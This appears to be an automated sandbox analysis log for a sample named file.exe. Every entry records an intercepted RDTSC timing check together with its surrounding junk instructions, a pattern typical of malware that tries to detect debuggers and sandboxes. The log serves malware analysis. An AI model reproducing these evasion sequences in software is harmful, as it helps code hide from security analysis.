          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB0EE second address: 5FB0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FAD66 second address: 5FAD80 instructions: 0x00000000 rdtsc 0x00000002 je 00007F37B4535CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F37B4535CDEh 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FF2F2 second address: 5FF2F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FF71E second address: 5FF722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FF722 second address: 5FF745 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F37B45370A5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007F37B4537096h 0x00000012 pop eax 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FF745 second address: 5FF74B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FF74B second address: 5FF751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FF751 second address: 5FF755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FF755 second address: 5FF76E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F37B453709Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0A00 second address: 5B0A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0A0A second address: 5B0A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F37B4537098h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e nop 0x0000000f mov dx, ax 0x00000012 push 00000004h 0x00000014 mov ecx, esi 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push esi 0x0000001b pop esi 0x0000001c jmp 00007F37B45370A0h 0x00000021 popad 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFA36 second address: 5FFA56 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F37B4535CE6h 0x00000008 jo 00007F37B4535CDEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFB8B second address: 5FFBAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F37B4537098h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603A70 second address: 603A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603A76 second address: 603A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603EFC second address: 603F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603F03 second address: 603F0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F37B4537096h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603F0F second address: 603F2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603F2C second address: 603F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F37B45370A6h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604097 second address: 6040B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007F37B4535CE3h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6040B3 second address: 6040D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F37B4537096h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push ecx 0x0000000d jmp 00007F37B45370A5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604242 second address: 60424A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60424A second address: 604254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604254 second address: 604269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F37B4535CDCh 0x0000000d popad 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604269 second address: 604281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F37B4537096h 0x0000000b je 00007F37B4537096h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604281 second address: 604291 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60A7CE second address: 60A7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60A7D2 second address: 60A7EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60A7EA second address: 60A7FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60A7FE second address: 60A807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60A807 second address: 60A80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AF71 second address: 60AF75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B224 second address: 60B228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B228 second address: 60B232 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F37B4535CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B7E3 second address: 60B7EF instructions: 0x00000000 rdtsc 0x00000002 je 00007F37B4537096h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60BDF7 second address: 60BE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F37B4535CD6h 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F37B4535CD6h 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C41A second address: 60C433 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F37B45370A3h 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C433 second address: 60C444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F37B4535CD6h 0x00000009 jng 00007F37B4535CD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612486 second address: 612492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616314 second address: 616318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615373 second address: 615380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F37B4537098h 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615380 second address: 615385 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6156E6 second address: 615709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Ah 0x00000007 jmp 00007F37B453709Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007F37B453709Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615709 second address: 615721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F37B4535CE6h 0x0000000c jmp 00007F37B4535CDAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615878 second address: 61587C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61587C second address: 61588C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jng 00007F37B4535CD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop ecx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6159CC second address: 6159D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6159D0 second address: 6159E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F37B4535CD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F37B4535CE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615B61 second address: 615B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615D1A second address: 615D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F37B4535CD6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615D24 second address: 615D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615D28 second address: 615D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615D31 second address: 615D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F37B45370D4h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F37B453709Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615D4C second address: 615D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616050 second address: 616054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F3D3 second address: 61F3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D8BC second address: 61D8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B45370A4h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F37B45370A7h 0x00000014 jnp 00007F37B4537098h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D8F9 second address: 61D90B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B4535CDEh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DA23 second address: 61DA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DA29 second address: 61DA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F37B4535CDCh 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DA3A second address: 61DA40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DA40 second address: 61DA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DA44 second address: 61DA61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E16D second address: 61E173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E173 second address: 61E179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E179 second address: 61E17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E17D second address: 61E183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E2A7 second address: 61E2AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E2AB second address: 61E2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F37B45370A5h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F37B45370A3h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E2DB second address: 61E312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F37B4535CDEh 0x0000000c jmp 00007F37B4535CE0h 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 ja 00007F37B4535CD6h 0x0000001b jc 00007F37B4535CD6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E312 second address: 61E31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F37B45370A2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E31F second address: 61E32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F37B4535CD6h 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EA61 second address: 61EA80 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F37B4537096h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F37B4537096h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EA80 second address: 61EA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EA84 second address: 61EA8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EA8A second address: 61EAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F37B4535CE0h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EAA3 second address: 61EAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D055 second address: 61D05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D05B second address: 61D08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F37B4537098h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jnl 00007F37B4537096h 0x00000015 jns 00007F37B4537096h 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F37B45370A0h 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624ED6 second address: 624EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62493E second address: 624944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624C4C second address: 624C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56797A second address: 567986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F37B4537096h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567986 second address: 56799B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F37B4535CDCh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56799B second address: 5679B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B45370A6h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5679B5 second address: 5679CC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F37B4535CDBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5679CC second address: 5679D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5679D0 second address: 567A00 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F37B4535CDDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F37B4535CD6h 0x00000013 jmp 00007F37B4535CE5h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633B00 second address: 633B0A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F37B4537096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633C6D second address: 633C7D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F37B4535CD6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633C7D second address: 633C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AEBE second address: 63AECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F37B4535CDCh 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C518 second address: 63C542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Fh 0x00000007 jmp 00007F37B45370A0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C542 second address: 63C548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643A58 second address: 643A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646CFA second address: 646D1B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F37B4535CE5h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646D1B second address: 646D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646D1F second address: 646D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646D2B second address: 646D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646BB3 second address: 646BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D0CC second address: 64D0D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BB48 second address: 64BB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
